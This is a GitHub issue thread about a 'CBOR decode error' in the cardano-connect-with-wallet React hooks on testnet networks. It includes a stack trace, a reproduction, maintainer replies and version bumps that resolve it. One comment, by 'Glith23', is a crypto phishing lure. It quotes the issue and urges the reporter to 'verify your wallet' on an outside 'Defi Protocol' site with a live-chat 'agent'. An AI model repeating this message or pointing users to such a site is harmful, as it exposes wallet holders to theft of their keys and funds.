### ISSUE TITLE
[BUG] CBOR decode error

### ISSUE THREAD

**Issue by solidsnakedev** [cardano-foundation/cardano-connect-with-wallet#72]
**Describe the bug**
Unhandled error when using useCardano hooks, this error happens if either `Preprod` or `Preview` is set in the wallet.

```typescript
Uncaught (in promise) Error: CBOR decode error: non-string keys not supported (got object)
    at eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:103216)
    at ie (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:103556)
    at eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:102603)
    at ie (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:102827)
    at se (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:103927)
    at eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:116930)
    at f (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:105012)
    at Generator.eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:106368)
    at Generator.eval [as next] (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:105375)
    at ce (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:111022)
    at s (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:111226)
```

**To Reproduce**

Follow Readme example and enable testnet for `limitNetwork`

```typescript
const {
        isEnabled,
        isConnected,
        enabledWallet,
        stakeAddress,
        signMessage,
        connect,
        disconnect,
        usedAddresses
    } = useCardano({limitNetwork: NetworkType.TESTNET});
```

1. Go to 'Nami'
2. Click on 'Network' and `Preprod`

**Expected behavior**
No erros

**Screenshots**

**Platform (please complete the following information):**
- Desktop
 - OS: [MacOS]
 - Browser [brave]
 - Version [Version 1.52.130 Chromium: 114.0.5735.198](https://brave.com/latest/)]

**Additional context**

**Comment by fabianbormann** [comment]
@solidsnakedev I will look into this. Thx for submitting the issue !

**Comment by fabianbormann** [comment]
@solidsnakedev I tested it with the latest version `@cardano-foundation/cardano-connect-with-wallet": "0.2.0"` and unfortunately I wasn't able to reproduce the bug. I'm using the component in my spare time project [WalkInWallet](https://github.com/fabianbormann/WalkInWallet) as well and I added `{limitNetwork: NetworkType.TESTNET}` to the `useCardano` hook and I was able to connect it without error to Nami (after switching to preprod or preview network). Did you try it in an open source project? Maybe I could have a look into the sources to get a deeper understanding of the error and/or I'm always happy to join a pair programming session 😊

**Comment by Glith23** [comment]
> **Describe the bug** Unhandled error when using useCardano hooks, this error happens if either `Preprod` or `Preview` is set in the wallet.
> 
> ```ts
> Uncaught (in promise) Error: CBOR decode error: non-string keys not supported (got object)
>     at eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:103216)
>     at ie (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:103556)
>     at eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:102603)
>     at ie (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:102827)
>     at se (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:103927)
>     at eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:116930)
>     at f (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:105012)
>     at Generator.eval (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:106368)
>     at Generator.eval [as next] (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:105375)
>     at ce (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:111022)
>     at s (webpack-internal:///(:3000/app-client)/./node_modules/@cardano-foundation/cardano-connect-with-wallet-core/dist/index.js:2:111226)
> ```
> 
> **To Reproduce** Steps to reproduce the behavior:
> 
> Follow Readme example and enable testnet for `limitNetwork`
> 
> ```ts
> const {
>         isEnabled,
>         isConnected,
>         enabledWallet,
>         stakeAddress,
>         signMessage,
>         connect,
>         disconnect,
>         usedAddresses
>     } = useCardano({limitNetwork: NetworkType.TESTNET});
> ```
> 
> 1. Go to 'Nami'
> 2. Click on 'Network' and `Preprod`
> 3. See error
> 
> **Expected behavior** No erros
> 
> **Screenshots** If applicable, add screenshots to help explain your problem.
> 
> **Platform (please complete the following information):**
> 
> * Desktop
> * OS: [MacOS]
> * Browser [brave]
> * Version [Version 1.52.130 Chromium: 114.0.5735.198](https://brave.com/latest/)]
> 
> **Additional context** Add any other context about the problem here.

Hi @solidsnakedev  
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defiproconect.online/defiprotocol/v1/defi/home/).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by solidsnakedev** [comment]
hey @fabianbormann thank you, the issue is fixed now , this was the core version installed  `@cardano-foundation/cardano-connect-with-wallet-core": "0.1.1",` with `@cardano-foundation/cardano-connect-with-wallet": "0.2.0`

I bumped it to and the error is gone
```
"@cardano-foundation/cardano-connect-with-wallet": "^0.2.4",
"@cardano-foundation/cardano-connect-with-wallet-core": "^0.2.2",
```

the problem I'm facing now is with the `connect` function from useCardano hook , it doesn't popup the wallet connection.
this is my personal project, I made a branch with cardano connect https://github.com/solidsnakedev/elemt-frontend/tree/cardano-connect-with-wallet

**Comment by fabianbormann** [comment]
Found the issue! I fixed it and it should be fixed in a min 😊

**Comment by fabianbormann** [comment]
Should now be solved:
```json
"@cardano-foundation/cardano-connect-with-wallet": "^0.2.5",
"@cardano-foundation/cardano-connect-with-wallet-core": "^0.2.3",
```

There was an issue in the core lib and I had to bump it's version in the react component as well.

**Comment by solidsnakedev** [comment]
Cool it did work! however the CBOR decoded error keeps coming back, but I think it only happens with wallets with multi assets and networks preprod and preview

**Comment by solidsnakedev** [comment]
Thanks for merging my PR this solved the issue

**Comment by fabianbormann** [comment]
Thank you for the PR ! @solidsnakedev 🎉
